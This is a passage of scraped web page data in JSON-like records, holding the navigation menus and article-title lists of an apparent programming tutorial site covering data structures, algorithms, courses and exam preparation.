"s": 10284, "text": "All DSA Problems" }, { "code": null, "e": 10320, "s": 10301, "text": "Problem of the Day" }, { "code": null, "e": 10354, "s": 10320, "text": "Interview Series: Weekly Contests" }, { "code": null, "e": 10388, "s": 10354, "text": "Bi-Wizard Coding: School Contests" }, { "code": null, "e": 10408, "s": 10388, "text": "Contests and Events" }, { "code": null, "e": 10427, "s": 10408, "text": "Practice SDE Sheet" }, { "code": null, "e": 10564, "s": 10427, "text": "Curated DSA ListsLove Babbar SheetTop 50 Array ProblemsTop 50 String ProblemsTop 50 Tree ProblemsTop 50 Graph ProblemsTop 50 DP Problems" }, { "code": null, "e": 10582, "s": 10564, "text": "Love Babbar Sheet" }, { "code": null, "e": 10604, "s": 10582, "text": "Top 50 Array Problems" }, { "code": null, "e": 10627, "s": 10604, "text": "Top 50 String Problems" }, { "code": null, "e": 10648, "s": 10627, "text": "Top 50 Tree Problems" }, { "code": null, "e": 10670, "s": 10648, "text": "Top 50 Graph Problems" }, { "code": null, "e": 10689, "s": 10670, "text": "Top 50 DP Problems" }, { "code": null, "e": 10960, "s": 10693, "text": "WriteCome write articles for us and get featuredPracticeLearn and code with the best industry expertsPremiumGet access to ad-free content, doubt assistance and more!JobsCome and find your dream job with usGeeks DigestQuizzesGeeks CampusGblog ArticlesIDECampus Mantri" }, { "code": null, "e": 10973, "s": 10960, "text": "Geeks Digest" }, { "code": null, "e": 10981, "s": 10973, "text": "Quizzes" }, { "code": null, "e": 10994, "s": 10981, "text": "Geeks Campus" }, { "code": null, "e": 11009, "s": 10994, "text": "Gblog Articles" }, { "code": null, "e": 11013, "s": 11009, "text": "IDE" }, { "code": null, "e": 11027, "s": 11013, "text": "Campus Mantri" }, { "code": null, "e": 11035, "s": 11027, "text": "Sign In" }, { "code": null, "e": 11043, "s": 11035, "text": "Sign In" }, { "code": null, "e": 11048, "s": 11043, "text": "Home" }, { "code": null, "e": 11061, "s": 11048, "text": "Saved Videos" }, { "code": null, "e": 11069, "s": 11061, "text": "Courses" }, { "code": null, "e": 15553, "s": 11069, "text": "\n\nFor Working Professionals\n \n\n\n\nLIVE\n \n\n\nDSA Live Classes\n\nSystem Design\n\nJava Backend Development\n\nFull Stack LIVE\n\nExplore More\n\n\nSelf-Paced\n \n\n\nDSA- Self Paced\n\nSDE Theory\n\nMust-Do Coding Questions\n\nExplore More\n\n\nFor Students\n \n\n\n\nLIVE\n \n\n\nCompetitive Programming\n\nData Structures with C++\n\nData Science\n\nExplore More\n\n\nSelf-Paced\n \n\n\nDSA- Self Paced\n\nCIP\n\nJAVA / Python / C++\n\nExplore More\n\n\nSchool Courses\n \n\n\nSchool Guide\n\nPython Programming\n\nLearn To Make Apps\n\nExplore more\n\n\nAlgorithms\n \n\n\nSearching Algorithms\n\nSorting Algorithms\n\nGraph Algorithms\n\nPattern Searching\n\nGeometric Algorithms\n\nMathematical\n\nBitwise Algorithms\n\nRandomized Algorithms\n\nGreedy Algorithms\n\nDynamic Programming\n\nDivide and Conquer\n\nBacktracking\n\nBranch and Bound\n\nAll Algorithms\n\n\nAnalysis of Algorithms\n \n\n\nAsymptotic Analysis\n\nWorst, Average and Best Cases\n\nAsymptotic Notations\n\nLittle o and little omega notations\n\nLower and Upper Bound Theory\n\nAnalysis of Loops\n\nSolving Recurrences\n\nAmortized Analysis\n\nWhat does 'Space Complexity' mean ?\n\nPseudo-polynomial Algorithms\n\nPolynomial Time Approximation Scheme\n\nA Time Complexity Question\n\n\nData Structures\n \n\n\nArrays\n\nLinked List\n\nStack\n\nQueue\n\nBinary Tree\n\nBinary Search Tree\n\nHeap\n\nHashing\n\nGraph\n\nAdvanced Data Structure\n\nMatrix\n\nStrings\n\nAll Data Structures\n\n\nInterview Corner\n \n\n\nCompany Preparation\n\nTop Topics\n\nPractice Company Questions\n\nInterview Experiences\n\nExperienced Interviews\n\nInternship Interviews\n\nCompetititve Programming\n\nDesign Patterns\n\nSystem Design Tutorial\n\nMultiple Choice Quizzes\n\n\nLanguages\n \n\n\nC\n\nC++\n\nJava\n\nPython\n\nC#\n\nJavaScript\n\njQuery\n\nSQL\n\nPHP\n\nScala\n\nPerl\n\nGo Language\n\nHTML\n\nCSS\n\nKotlin\n\n\nML & Data Science\n \n\n\nMachine Learning\n\nData Science\n\n\nCS Subjects\n \n\n\nMathematics\n\nOperating System\n\nDBMS\n\nComputer Networks\n\nComputer Organization and Architecture\n\nTheory of Computation\n\nCompiler Design\n\nDigital Logic\n\nSoftware Engineering\n\n\nGATE\n \n\n\nGATE Computer Science Notes\n\nLast Minute Notes\n\nGATE CS Solved Papers\n\nGATE CS Original Papers and Official Keys\n\nGATE 2021 Dates\n\nGATE CS 2021 Syllabus\n\nImportant Topics for GATE CS\n\n\nWeb Technologies\n \n\n\nHTML\n\nCSS\n\nJavaScript\n\nAngularJS\n\nReactJS\n\nNodeJS\n\nBootstrap\n\njQuery\n\nPHP\n\n\nSoftware Designs\n \n\n\nSoftware Design Patterns\n\nSystem Design Tutorial\n\n\nSchool Learning\n \n\n\nSchool Programming\n\n\nMathematics\n \n\n\nNumber System\n\nAlgebra\n\nTrigonometry\n\nStatistics\n\nProbability\n\nGeometry\n\nMensuration\n\nCalculus\n\n\nMaths Notes (Class 8-12)\n \n\n\nClass 8 Notes\n\nClass 9 Notes\n\nClass 10 Notes\n\nClass 11 Notes\n\nClass 12 Notes\n\n\nNCERT Solutions\n \n\n\nClass 8 Maths Solution\n\nClass 9 Maths Solution\n\nClass 10 Maths Solution\n\nClass 11 Maths Solution\n\nClass 12 Maths Solution\n\n\nRD Sharma Solutions\n \n\n\nClass 8 Maths Solution\n\nClass 9 Maths Solution\n\nClass 10 Maths Solution\n\nClass 11 Maths Solution\n\nClass 12 Maths Solution\n\n\nPhysics Notes (Class 8-11)\n \n\n\nClass 8 Notes\n\nClass 9 Notes\n\nClass 10 Notes\n\nClass 11 Notes\n\n\nCS Exams/PSUs\n \n\n\n\nISRO\n \n\n\nISRO CS Original Papers and Official Keys\n\nISRO CS Solved Papers\n\nISRO CS Syllabus for Scientist/Engineer Exam\n\n\nUGC NET\n \n\n\nUGC NET CS Notes Paper II\n\nUGC NET CS Notes Paper III\n\nUGC NET CS Solved Papers\n\n\nStudent\n \n\n\nCampus Ambassador Program\n\nSchool Ambassador Program\n\nProject\n\nGeek of the Month\n\nCampus Geek of the Month\n\nPlacement Course\n\nCompetititve Programming\n\nTestimonials\n\nStudent Chapter\n\nGeek on the Top\n\nInternship\n\nCareers\n\n\nCurated DSA Lists\n \n\n\nLove Babbar Sheet\n\nTop 50 Array Problems\n\nTop 50 String Problems\n\nTop 50 Tree Problems\n\nTop 50 Graph Problems\n\nTop 50 DP Problems\n\n\nTutorials\n \n\n\n\nJobs\n \n\n\nApply for Jobs\n\nPost a Job\n\nJOB-A-THON\n\n\nPractice\n \n\n\nAll DSA Problems\n\nProblem of the Day\n\nInterview Series: Weekly Contests\n\nBi-Wizard Coding: School Contests\n\nContests and Events\n\nPractice SDE Sheet\n" }, { "code": null, "e": 15607, "s": 15553, "text": "\nFor Working Professionals\n \n\n" }, { "code": null, "e": 15730, "s": 15607, "text": "\nLIVE\n \n\n\nDSA Live Classes\n\nSystem Design\n\nJava Backend Development\n\nFull Stack LIVE\n\nExplore More\n" }, { "code": null, "e": 15749, "s": 15730, "text": "\nDSA Live Classes\n" }, { "code": null, "e": 15765, "s": 15749, "text": "\nSystem Design\n" }, { "code": null, "e": 15792, "s": 15765, "text": "\nJava Backend Development\n" }, { "code": null, "e": 15810, "s": 15792, "text": "\nFull Stack LIVE\n" }, { "code": null, "e": 15825, "s": 15810, "text": "\nExplore More\n" }, { "code": null, "e": 15933, "s": 15825, "text": "\nSelf-Paced\n \n\n\nDSA- Self Paced\n\nSDE Theory\n\nMust-Do Coding Questions\n\nExplore More\n" }, { "code": null, "e": 15951, "s": 15933, "text": "\nDSA- Self Paced\n" }, { "code": null, "e": 15964, "s": 15951, "text": "\nSDE Theory\n" }, { "code": null, "e": 15991, "s": 15964, "text": "\nMust-Do Coding Questions\n" }, { "code": null, "e": 16006, "s": 15991, "text": "\nExplore More\n" }, { "code": null, "e": 16047, "s": 16006, "text": "\nFor Students\n \n\n" }, { "code": null, "e": 16159, "s": 16047, "text": "\nLIVE\n \n\n\nCompetitive Programming\n\nData Structures with C++\n\nData Science\n\nExplore More\n" }, { "code": null, "e": 16185, "s": 16159, "text": "\nCompetitive Programming\n" }, { "code": null, "e": 16212, "s": 16185, "text": "\nData Structures with C++\n" }, { "code": null, "e": 16227, "s": 16212, "text": "\nData Science\n" }, { "code": null, "e": 16242, "s": 16227, "text": "\nExplore More\n" }, { "code": null, "e": 16338, "s": 16242, "text": "\nSelf-Paced\n \n\n\nDSA- Self Paced\n\nCIP\n\nJAVA / Python / C++\n\nExplore More\n" }, { "code": null, "e": 16356, "s": 16338, "text": "\nDSA- Self Paced\n" }, { "code": null, "e": 16362, "s": 16356, "text": "\nCIP\n" }, { "code": null, "e": 16384, "s": 16362, "text": "\nJAVA / Python / C++\n" }, { "code": null, "e": 16399, "s": 16384, "text": "\nExplore More\n" }, { "code": null, "e": 16510, "s": 16399, "text": "\nSchool Courses\n \n\n\nSchool Guide\n\nPython Programming\n\nLearn To Make Apps\n\nExplore more\n" }, { "code": null, "e": 16525, "s": 16510, "text": "\nSchool Guide\n" }, { "code": null, "e": 16546, "s": 16525, "text": "\nPython Programming\n" }, { "code": null, "e": 16567, "s": 16546, "text": "\nLearn To Make Apps\n" }, { "code": null, "e": 16582, "s": 16567, "text": "\nExplore more\n" }, { "code": null, "e": 16887, "s": 16582, "text": "\nAlgorithms\n \n\n\nSearching Algorithms\n\nSorting Algorithms\n\nGraph Algorithms\n\nPattern Searching\n\nGeometric Algorithms\n\nMathematical\n\nBitwise Algorithms\n\nRandomized Algorithms\n\nGreedy Algorithms\n\nDynamic Programming\n\nDivide and Conquer\n\nBacktracking\n\nBranch and Bound\n\nAll Algorithms\n" }, { "code": null, "e": 16910, "s": 16887, "text": "\nSearching Algorithms\n" }, { "code": null, "e": 16931, "s": 16910, "text": "\nSorting Algorithms\n" }, { "code": null, "e": 16950, "s": 16931, "text": "\nGraph Algorithms\n" }, { "code": null, "e": 16970, "s": 16950, "text": "\nPattern Searching\n" }, { "code": null, "e": 16993, "s": 16970, "text": "\nGeometric Algorithms\n" }, { "code": null, "e": 17008, "s": 16993, "text": "\nMathematical\n" }, { "code": null, "e": 17029, "s": 17008, "text": "\nBitwise Algorithms\n" }, { "code": null, "e": 17053, "s": 17029, "text": "\nRandomized Algorithms\n" }, { "code": null, "e": 17073, "s": 17053, "text": "\nGreedy Algorithms\n" }, { "code": null, "e": 17095, "s": 17073, "text": "\nDynamic Programming\n" }, { "code": null, "e": 17116, "s": 17095, "text": "\nDivide and Conquer\n" }, { "code": null, "e": 17131, "s": 17116, "text": "\nBacktracking\n" }, { "code": null, "e": 17150, "s": 17131, "text": "\nBranch and Bound\n" }, { "code": null, "e": 17167, "s": 17150, "text": "\nAll Algorithms\n" }, { "code": null, "e": 17552, "s": 17167, "text": "\nAnalysis of Algorithms\n \n\n\nAsymptotic Analysis\n\nWorst, Average and Best Cases\n\nAsymptotic Notations\n\nLittle o and little omega notations\n\nLower and Upper Bound Theory\n\nAnalysis of Loops\n\nSolving Recurrences\n\nAmortized Analysis\n\nWhat does 'Space Complexity' mean ?\n\nPseudo-polynomial Algorithms\n\nPolynomial Time Approximation Scheme\n\nA Time Complexity Question\n" }, { "code": null, "e": 17574, "s": 17552, "text": "\nAsymptotic Analysis\n" }, { "code": null, "e": 17606, "s": 17574, "text": "\nWorst, Average and Best Cases\n" }, { "code": null, "e": 17629, "s": 17606, "text": "\nAsymptotic Notations\n" }, { "code": null, "e": 17667, "s": 17629, "text": "\nLittle o and little omega notations\n" }, { "code": null, "e": 17698, "s": 17667, "text": "\nLower and Upper Bound Theory\n" }, { "code": null, "e": 17718, "s": 17698, "text": "\nAnalysis of Loops\n" }, { "code": null, "e": 17740, "s": 17718, "text": "\nSolving Recurrences\n" }, { "code": null, "e": 17761, "s": 17740, "text": "\nAmortized Analysis\n" }, { "code": null, "e": 17799, "s": 17761, "text": "\nWhat does 'Space Complexity' mean ?\n" }, { "code": null, "e": 17830, "s": 17799, "text": "\nPseudo-polynomial Algorithms\n" }, { "code": null, "e": 17869, "s": 17830, "text": "\nPolynomial Time Approximation Scheme\n" }, { "code": null, "e": 17898, "s": 17869, "text": "\nA Time Complexity Question\n" }, { "code": null, "e": 18095, "s": 17898, "text": "\nData Structures\n \n\n\nArrays\n\nLinked List\n\nStack\n\nQueue\n\nBinary Tree\n\nBinary Search Tree\n\nHeap\n\nHashing\n\nGraph\n\nAdvanced Data Structure\n\nMatrix\n\nStrings\n\nAll Data Structures\n" }, { "code": null, "e": 18104, "s": 18095, "text": "\nArrays\n" }, { "code": null, "e": 18118, "s": 18104, "text": "\nLinked List\n" }, { "code": null, "e": 18126, "s": 18118, "text": "\nStack\n" }, { "code": null, "e": 18134, "s": 18126, "text": "\nQueue\n" }, { "code": null, "e": 18148, "s": 18134, "text": "\nBinary Tree\n" }, { "code": null, "e": 18169, "s": 18148, "text": "\nBinary Search Tree\n" }, { "code": null, "e": 18176, "s": 18169, "text": "\nHeap\n" }, { "code": null, "e": 18186, "s": 18176, "text": "\nHashing\n" }, { "code": null, "e": 18194, "s": 18186, "text": "\nGraph\n" }, { "code": null, "e": 18220, "s": 18194, "text": "\nAdvanced Data Structure\n" }, { "code": null, "e": 18229, "s": 18220, "text": "\nMatrix\n" }, { "code": null, "e": 18239, "s": 18229, "text": "\nStrings\n" }, { "code": null, "e": 18261, "s": 18239, "text": "\nAll Data Structures\n" }, { "code": null, "e": 18529, "s": 18261, "text": "\nInterview Corner\n \n\n\nCompany Preparation\n\nTop Topics\n\nPractice Company Questions\n\nInterview Experiences\n\nExperienced Interviews\n\nInternship Interviews\n\nCompetititve Programming\n\nDesign Patterns\n\nSystem Design Tutorial\n\nMultiple Choice Quizzes\n" }, { "code": null, "e": 18551, "s": 18529, "text": "\nCompany Preparation\n" }, { "code": null, "e": 18564, "s": 18551, "text": "\nTop Topics\n" }, { "code": null, "e": 18593, "s": 18564, "text": "\nPractice Company Questions\n" }, { "code": null, "e": 18617, "s": 18593, "text": "\nInterview Experiences\n" }, { "code": null, "e": 18642, "s": 18617, "text": "\nExperienced Interviews\n" }, { "code": null, "e": 18666, "s": 18642, "text": "\nInternship Interviews\n" }, { "code": null, "e": 18693, "s": 18666, "text": "\nCompetititve Programming\n" }, { "code": null, "e": 18711, "s": 18693, "text": "\nDesign Patterns\n" }, { "code": null, "e": 18736, "s": 18711, "text": "\nSystem Design Tutorial\n" }, { "code": null, "e": 18762, "s": 18736, "text": "\nMultiple Choice Quizzes\n" }, { "code": null, "e": 18901, "s": 18762, "text": "\nLanguages\n \n\n\nC\n\nC++\n\nJava\n\nPython\n\nC#\n\nJavaScript\n\njQuery\n\nSQL\n\nPHP\n\nScala\n\nPerl\n\nGo Language\n\nHTML\n\nCSS\n\nKotlin\n" }, { "code": null, "e": 18905, "s": 18901, "text": "\nC\n" }, { "code": null, "e": 18911, "s": 18905, "text": "\nC++\n" }, { "code": null, "e": 18918, "s": 18911, "text": "\nJava\n" }, { "code": null, "e": 18927, "s": 18918, "text": "\nPython\n" }, { "code": null, "e": 18932, "s": 18927, "text": "\nC#\n" }, { "code": null, "e": 18945, "s": 18932, "text": "\nJavaScript\n" }, { "code": null, "e": 18954, "s": 18945, "text": "\njQuery\n" }, { "code": null, "e": 18960, "s": 18954, "text": "\nSQL\n" }, { "code": null, "e": 18966, "s": 18960, "text": "\nPHP\n" }, { "code": null, "e": 18974, "s": 18966, "text": "\nScala\n" }, { "code": null, "e": 18981, "s": 18974, "text": "\nPerl\n" }, { "code": null, "e": 18995, "s": 18981, "text": "\nGo Language\n" }, { "code": null, "e": 19002, "s": 18995, "text": "\nHTML\n" }, { "code": null, "e": 19008, "s": 19002, "text": "\nCSS\n" }, { "code": null, "e": 19017, "s": 19008, "text": "\nKotlin\n" }, { "code": null, "e": 19095, "s": 19017, "text": "\nML & Data Science\n \n\n\nMachine Learning\n\nData Science\n" }, { "code": null, "e": 19114, "s": 19095, "text": "\nMachine Learning\n" }, { "code": null, "e": 19129, "s": 19114, "text": "\nData Science\n" }, { "code": null, "e": 19342, "s": 19129, "text": "\nCS Subjects\n \n\n\nMathematics\n\nOperating System\n\nDBMS\n\nComputer Networks\n\nComputer Organization and Architecture\n\nTheory of Computation\n\nCompiler Design\n\nDigital Logic\n\nSoftware Engineering\n" }, { "code": null, "e": 19356, "s": 19342, "text": "\nMathematics\n" }, { "code": null, "e": 19375, "s": 19356, "text": "\nOperating System\n" }, { "code": null, "e": 19382, "s": 19375, "text": "\nDBMS\n" }, { "code": null, "e": 19402, "s": 19382, "text": "\nComputer Networks\n" }, { "code": null, "e": 19443, "s": 19402, "text": "\nComputer Organization and Architecture\n" }, { "code": null, "e": 19467, "s": 19443, "text": "\nTheory of Computation\n" }, { "code": null, "e": 19485, "s": 19467, "text": "\nCompiler Design\n" }, { "code": null, "e": 19501, "s": 19485, "text": "\nDigital Logic\n" }, { "code": null, "e": 19524, "s": 19501, "text": "\nSoftware Engineering\n" }, { "code": null, "e": 19741, "s": 19524, "text": "\nGATE\n \n\n\nGATE Computer Science Notes\n\nLast Minute Notes\n\nGATE CS Solved Papers\n\nGATE CS Original Papers and Official Keys\n\nGATE 2021 Dates\n\nGATE CS 2021 Syllabus\n\nImportant Topics for GATE CS\n" }, { "code": null, "e": 19771, "s": 19741, "text": "\nGATE Computer Science Notes\n" }, { "code": null, "e": 19791, "s": 19771, "text": "\nLast Minute Notes\n" }, { "code": null, "e": 19815, "s": 19791, "text": "\nGATE CS Solved Papers\n" }, { "code": null, "e": 19859, "s": 19815, "text": "\nGATE CS Original Papers and Official Keys\n" }, { "code": null, "e": 19877, "s": 19859, "text": "\nGATE 2021 Dates\n" }, { "code": null, "e": 19901, "s": 19877, "text": "\nGATE CS 2021 Syllabus\n" }, { "code": null, "e": 19932, "s": 19901, "text": "\nImportant Topics for GATE CS\n" }, { "code": null, "e": 20052, "s": 19932, "text": "\nWeb Technologies\n \n\n\nHTML\n\nCSS\n\nJavaScript\n\nAngularJS\n\nReactJS\n\nNodeJS\n\nBootstrap\n\njQuery\n\nPHP\n" }, { "code": null, "e": 20059, "s": 20052, "text": "\nHTML\n" }, { "code": null, "e": 20065, "s": 20059, "text": "\nCSS\n" }, { "code": null, "e": 20078, "s": 20065, "text": "\nJavaScript\n" }, { "code": null, "e": 20090, "s": 20078, "text": "\nAngularJS\n" }, { "code": null, "e": 20100, "s": 20090, "text": "\nReactJS\n" }, { "code": null, "e": 20109, "s": 20100, "text": "\nNodeJS\n" }, { "code": null, "e": 20121, "s": 20109, "text": "\nBootstrap\n" }, { "code": null, "e": 20130, "s": 20121, "text": "\njQuery\n" }, { "code": null, "e": 20136, "s": 20130, "text": "\nPHP\n" }, { "code": null, "e": 20231, "s": 20136, "text": "\nSoftware Designs\n \n\n\nSoftware Design Patterns\n\nSystem Design Tutorial\n" }, { "code": null, "e": 20258, "s": 20231, "text": "\nSoftware Design Patterns\n" }, { "code": null, "e": 20283, "s": 20258, "text": "\nSystem Design Tutorial\n" }, { "code": null, "e": 20347, "s": 20283, "text": "\nSchool Learning\n \n\n\nSchool Programming\n" }, { "code": null, "e": 20368, "s": 20347, "text": "\nSchool Programming\n" }, { "code": null, "e": 20504, "s": 20368, "text": "\nMathematics\n \n\n\nNumber System\n\nAlgebra\n\nTrigonometry\n\nStatistics\n\nProbability\n\nGeometry\n\nMensuration\n\nCalculus\n" }, { "code": null, "e": 20520, "s": 20504, "text": "\nNumber System\n" }, { "code": null, "e": 20530, "s": 20520, "text": "\nAlgebra\n" }, { "code": null, "e": 20545, "s": 20530, "text": "\nTrigonometry\n" }, { "code": null, "e": 20558, "s": 20545, "text": "\nStatistics\n" }, { "code": null, "e": 20572, "s": 20558, "text": "\nProbability\n" }, { "code": null, "e": 20583, "s": 20572, "text": "\nGeometry\n" }, { "code": null, "e": 20597, "s": 20583, "text": "\nMensuration\n" }, { "code": null, "e": 20608, "s": 20597, "text": "\nCalculus\n" }, { "code": null, "e": 20739, "s": 20608, "text": "\nMaths Notes (Class 8-12)\n \n\n\nClass 8 Notes\n\nClass 9 Notes\n\nClass 10 Notes\n\nClass 11 Notes\n\nClass 12 Notes\n" }, { "code": null, "e": 20755, "s": 20739, "text": "\nClass 8 Notes\n" }, { "code": null, "e": 20771, "s": 20755, "text": "\nClass 9 Notes\n" }, { "code": null, "e": 20788, "s": 20771, "text": "\nClass 10 Notes\n" }, { "code": null, "e": 20805, "s": 20788, "text": "\nClass 11 Notes\n" }, { "code": null, "e": 20822, "s": 20805, "text": "\nClass 12 Notes\n" }, { "code": null, "e": 20989, "s": 20822, "text": "\nNCERT Solutions\n \n\n\nClass 8 Maths Solution\n\nClass 9 Maths Solution\n\nClass 10 Maths Solution\n\nClass 11 Maths Solution\n\nClass 12 Maths Solution\n" }, { "code": null, "e": 21014, "s": 20989, "text": "\nClass 8 Maths Solution\n" }, { "code": null, "e": 21039, "s": 21014, "text": "\nClass 9 Maths Solution\n" }, { "code": null, "e": 21065, "s": 21039, "text": "\nClass 10 Maths Solution\n" }, { "code": null, "e": 21091, "s": 21065, "text": "\nClass 11 Maths Solution\n" }, { "code": null, "e": 21117, "s": 21091, "text": "\nClass 12 Maths Solution\n" }, { "code": null, "e": 21288, "s": 21117, "text": "\nRD Sharma Solutions\n \n\n\nClass 8 Maths Solution\n\nClass 9 Maths Solution\n\nClass 10 Maths Solution\n\nClass 11 Maths Solution\n\nClass 12 Maths Solution\n" }, { "code": null, "e": 21313, "s": 21288, "text": "\nClass 8 Maths Solution\n" }, { "code": null, "e": 21338, "s": 21313, "text": "\nClass 9 Maths Solution\n" }, { "code": null, "e": 21364, "s": 21338, "text": "\nClass 10 Maths Solution\n" }, { "code": null, "e": 21390, "s": 21364, "text": "\nClass 11 Maths Solution\n" }, { "code": null, "e": 21416, "s": 21390, "text": "\nClass 12 Maths Solution\n" }, { "code": null, "e": 21533, "s": 21416, "text": "\nPhysics Notes (Class 8-11)\n \n\n\nClass 8 Notes\n\nClass 9 Notes\n\nClass 10 Notes\n\nClass 11 Notes\n" }, { "code": null, "e": 21549, "s": 21533, "text": "\nClass 8 Notes\n" }, { "code": null, "e": 21565, "s": 21549, "text": "\nClass 9 Notes\n" }, { "code": null, "e": 21582, "s": 21565, "text": "\nClass 10 Notes\n" }, { "code": null, "e": 21599, "s": 21582, "text": "\nClass 11 Notes\n" }, { "code": null, "e": 21641, "s": 21599, "text": "\nCS Exams/PSUs\n \n\n" }, { "code": null, "e": 21786, "s": 21641, "text": "\nISRO\n \n\n\nISRO CS Original Papers and Official Keys\n\nISRO CS Solved Papers\n\nISRO CS Syllabus for Scientist/Engineer Exam\n" }, { "code": null, "e": 21830, "s": 21786, "text": "\nISRO CS Original Papers and Official Keys\n" }, { "code": null, "e": 21854, "s": 21830, "text": "\nISRO CS Solved Papers\n" }, { "code": null, "e": 21901, "s": 21854, "text": "\nISRO CS Syllabus for Scientist/Engineer Exam\n" }, { "code": null, "e": 22018, "s": 21901, "text": "\nUGC NET\n \n\n\nUGC NET CS Notes Paper II\n\nUGC NET CS Notes Paper III\n\nUGC NET CS Solved Papers\n" }, { "code": null, "e": 22046, "s": 22018, "text": "\nUGC NET CS Notes Paper II\n" }, { "code": null, "e": 22075, "s": 22046, "text": "\nUGC NET CS Notes Paper III\n" }, { "code": null, "e": 22102, "s": 22075, "text": "\nUGC NET CS Solved Papers\n" }, { "code": null, "e": 22359, "s": 22102, "text": "\nStudent\n \n\n\nCampus Ambassador Program\n\nSchool Ambassador Program\n\nProject\n\nGeek of the Month\n\nCampus Geek of the Month\n\nPlacement Course\n\nCompetititve Programming\n\nTestimonials\n\nStudent Chapter\n\nGeek on the Top\n\nInternship\n\nCareers\n" }, { "code": null, "e": 22387, "s": 22359, "text": "\nCampus Ambassador Program\n" }, { "code": null, "e": 22415, "s": 22387, "text": "\nSchool Ambassador Program\n" }, { "code": null, "e": 22425, "s": 22415, "text": "\nProject\n" }, { "code": null, "e": 22445, "s": 22425, "text": "\nGeek of the Month\n" }, { "code": null, "e": 22472, "s": 22445, "text": "\nCampus Geek of the Month\n" }, { "code": null, "e": 22491, "s": 22472, "text": "\nPlacement Course\n" }, { "code": null, "e": 22518, "s": 22491, "text": "\nCompetititve Programming\n" }, { "code": null, "e": 22533, "s": 22518, "text": "\nTestimonials\n" }, { "code": null, "e": 22551, "s": 22533, "text": "\nStudent Chapter\n" }, { "code": null, "e": 22569, "s": 22551, "text": "\nGeek on the Top\n" }, { "code": null, "e": 22582, "s": 22569, "text": "\nInternship\n" }, { "code": null, "e": 22592, "s": 22582, "text": "\nCareers\n" }, { "code": null, "e": 22769, "s": 22592, "text": "\nCurated DSA Lists\n \n\n\nLove Babbar Sheet\n\nTop 50 Array Problems\n\nTop 50 String Problems\n\nTop 50 Tree Problems\n\nTop 50 Graph Problems\n\nTop 50 DP Problems\n" }, { "code": null, "e": 22789, "s": 22769, "text": "\nLove Babbar Sheet\n" }, { "code": null, "e": 22813, "s": 22789, "text": "\nTop 50 Array Problems\n" }, { "code": null, "e": 22838, "s": 22813, "text": "\nTop 50 String Problems\n" }, { "code": null, "e": 22861, "s": 22838, "text": "\nTop 50 Tree Problems\n" }, { "code": null, "e": 22885, "s": 22861, "text": "\nTop 50 Graph Problems\n" }, { "code": null, "e": 22906, "s": 22885, "text": "\nTop 50 DP Problems\n" }, { "code": null, "e": 22944, "s": 22906, "text": "\nTutorials\n \n\n" }, { "code": null, "e": 23017, "s": 22944, "text": "\nJobs\n \n\n\nApply for Jobs\n\nPost a Job\n\nJOB-A-THON\n" }, { "code": null, "e": 23034, "s": 23017, "text": "\nApply for Jobs\n" }, { "code": null, "e": 23047, "s": 23034, "text": "\nPost a Job\n" }, { "code": null, "e": 23060, "s": 23047, "text": "\nJOB-A-THON\n" }, { "code": null, "e": 23246, "s": 23060, "text": "\nPractice\n \n\n\nAll DSA Problems\n\nProblem of the Day\n\nInterview Series: Weekly Contests\n\nBi-Wizard Coding: School Contests\n\nContests and Events\n\nPractice SDE Sheet\n" }, { "code": null, "e": 23265, "s": 23246, "text": "\nAll DSA Problems\n" }, { "code": null, "e": 23286, "s": 23265, "text": "\nProblem of the Day\n" }, { "code": null, "e": 23322, "s": 23286, "text": "\nInterview Series: Weekly Contests\n" }, { "code": null, "e": 23358, "s": 23322, "text": "\nBi-Wizard Coding: School Contests\n" }, { "code": null, "e": 23380, "s": 23358, "text": "\nContests and Events\n" }, { "code": null, "e": 23401, "s": 23380, "text": "\nPractice SDE Sheet\n" }, { "code": null, "e": 23407, "s": 23401, "text": "GBlog" }, { "code": null, "e": 23415, "s": 23407, "text": "Puzzles" }, { "code": null, "e": 23428, "s": 23415, "text": "What's New ?" }, { "code": null, "e": 23434, "s": 23428, "text": "Array" }, { "code": null, "e": 23441, "s": 23434, "text": "Matrix" }, { "code": null, "e": 23449, "s": 23441, "text": "Strings" }, { "code": null, "e": 23457, "s": 23449, "text": "Hashing" }, { "code": null, "e": 23469, "s": 23457, "text": "Linked List" }, { "code": null, "e": 23475, "s": 23469, "text": "Stack" }, { "code": null, "e": 23481, "s": 23475, "text": "Queue" }, { "code": null, "e": 23493, "s": 23481, "text": "Binary Tree" }, { "code": null, "e": 23512, "s": 23493, "text": "Binary Search Tree" }, { "code": null, "e": 23517, "s": 23512, "text": "Heap" }, { "code": null, "e": 23523, "s": 23517, "text": "Graph" }, { "code": null, "e": 23533, "s": 23523, "text": "Searching" }, { "code": null, "e": 23541, "s": 23533, "text": "Sorting" }, { "code": null, "e": 23558, "s": 23541, "text": "Divide & Conquer" }, { "code": null, "e": 23571, "s": 23558, "text": "Mathematical" }, { "code": null, "e": 23581, "s": 23571, "text": "Geometric" }, { "code": null, "e": 23589, "s": 23581, "text": "Bitwise" }, { "code": null, "e": 23596, "s": 23589, "text": "Greedy" }, { "code": null, "e": 23609, "s": 23596, "text": "Backtracking" }, { "code": null, "e": 23626, "s": 23609, "text": "Branch and Bound" }, { "code": null, "e": 23646, "s": 23626, "text": "Dynamic Programming" }, { "code": null, "e": 23664, "s": 23646, "text": "Pattern Searching" }, { "code": null, "e": 23675, "s": 23664, "text": "Randomized" }, { "code": null, "e": 23704, "s": 23675, "text": "AVL Tree | Set 1 (Insertion)" }, { "code": null, "e": 23731, "s": 23704, "text": "Trie | (Insert and Search)" }, { "code": null, "e": 23756, "s": 23731, "text": "LRU Cache Implementation" }, { "code": null, "e": 23794, "s": 23756, "text": "Red-Black Tree | Set 1 (Introduction)" }, { "code": null, "e": 23817, "s": 23794, "text": "Introduction of B-Tree" }, { "code": null, "e": 23859, "s": 23817, "text": "Segment Tree | Set 1 (Sum of given range)" }, { "code": null, "e": 23893, "s": 23859, "text": "Agents in Artificial Intelligence" }, { "code": null, "e": 23921, "s": 23893, "text": "AVL Tree | Set 2 (Deletion)" }, { "code": null, "e": 23961, "s": 23921, "text": "Decision Tree Introduction with example" }, { "code": null, "e": 23993, "s": 23961, "text": "Red-Black Tree | Set 2 (Insert)" }, { "code": null, "e": 24029, "s": 23993, "text": "Binary Indexed Tree or Fenwick Tree" }, { "code": null, "e": 24058, "s": 24029, "text": "Disjoint Set Data Structures" }, { "code": null, "e": 24085, "s": 24058, "text": "Insert Operation in B-Tree" }, { "code": null, "e": 24105, "s": 24085, "text": "Design a Chess Game" }, { "code": null, "e": 24119, "s": 24105, "text": "Binomial Heap" }, { "code": null, "e": 24211, "s": 24119, "text": "Design a data structure that supports insert, delete, search and getRandom in 